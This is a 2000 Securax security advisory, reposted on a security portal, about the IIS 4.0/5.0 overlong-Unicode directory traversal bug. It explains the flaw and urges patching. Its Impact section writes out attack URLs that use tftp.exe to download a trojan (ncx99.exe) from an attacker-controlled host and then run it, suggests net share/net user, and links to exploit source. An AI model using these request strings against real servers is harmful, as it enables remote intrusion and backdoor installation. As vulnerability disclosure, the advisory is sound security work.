[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Ms Windows IIS4.0 - 5.0 allows executing commands

Title: Ms Windows IIS4.0 - 5.0 allows executing commands
Released by: Securax
Date: 24th October 2000
Printable version: Click here 
=====================================================================

Securax-SA-06 Security Advisory

belgian.networking.security Dutch

=====================================================================

Topic: Ms Windows IIS4.0 - 5.0 allows executing commands

and uploading files using TFTP and SAMBA.

Announced: 2000-10-23

Updated: 2000-10-24

Affects: IIS 4.0, 5.0

None affected: Apache, IIS 3.0

Obsoletes: /

=====================================================================



THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR

RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS

100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR

NOTICE.

PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING

THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ.

THANK YOU,







I. Background

As mentioned in other advisories, remote users can execute any

command on several IIS 4.0 and 5.0 systems by using overlong

unicode representations for ../

What are these overlong unicode representations? Unicode v2.0

allows multiple encoding possibilities for each character, for

instance:

2f

c0 af

e0 80 af

f0 80 80 af

f8 80 80 80 af

fc 80 80 80 80 af

... are all some of the possible representations for "/". A good

unicode decoder should disallow all representations with a hex

value larger then the smallest possible representation to avoid

problems with filtering.

This is where things go wrong in IIS4.0 and 5.0, IIS first scans the

given url for ../ and ..\ and for the normal unicode of these

strings, if those are found, the string is rejected, if these are

not found, the string will be decoded and interpreted. IIS first

filtering and then decoding can be derived from the differences in

error.log and acces.log when it comes to handling encoded urls.

Since the filter does NOT check for the huge amount of overlong

unicode representations of ../ and ..\ the filter is bypassed and

the directory traversalling routine is invoked. Until now, only

servers that have the /wwwroot/ dir on the same partition as the as

the WINNT dir seem to be vulnerable.

(Although we noticed that for some reason if an inactive

/Inetpub/wwwroot/ exists on the c: drive, you will be able to

run commands even if the active wwwroot is on the d: drive)

Exploiting this bug is quite easy, but using pipes (>|<) always

causes a 500 server error, without these quotes, we cannot use

interactive standard NT executables like ftp or telnet or, by using

ftp.exe < script and we cannot create files with custom contents by

using echo "blah blah" > filename.

Thus we are limited to viewing, deleting and copying files, not

changing the contents of files or running our very own trojan.









II. Problem Description

Anonymous, remote ( IUSR_xxxxx ) users can view, copy, delete, md

and issue other non-ACL protected commands from their browser

windows. The possibilities even include uploading trojans and

other hostile codes, viewing .asp files, ...







III. Impact



By using tftp.exe that comes with NT and win2k by connecting and

downloading a trojan from a tftp daemon you can bypass these

restrictions. Install < http://ftp.cavebear.com/karl/tftpd32.zip >

and connect from your compromised to your local machine using the

command " tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".

You van do so wiith this url:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe

then all you have to do is run the trojan with:

/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe



You might also use the samba commands: "net share and net user"

on the target and "net use" on the local machine... but this does

not always seem to work. (coz. netbios is not installed?)



IV. Solution

This *should* get patched asap, since a lot of servers seen to be

vulnerable. The possibilities on this exploit are bigger than meets

the eye, and we all had our share of warnings when the msadc exploded

in our faces. This vulnerability is serious, so patch this as soon

as possible.





V. Credits

UNICODE decoding flaw posted to packetstorm forum by an unknown

author.  for the Samba tryout and writeup

 for the TFTP.







VI. Source code

http://www.unixandbeer.com/reggie/IIS4-5.exe

http://packetstorm.securify.com/0010-exploits/iisex.c



recommended reading (unicode):

http://www.unicode.org/charts/PDF/

http://home.sch.bme.hu/~kisza/secure-programs/x401.html

http://www.cl.cam.ac.uk/~mgk25/unicode.html






(C) 1999-2000 All rights reserved.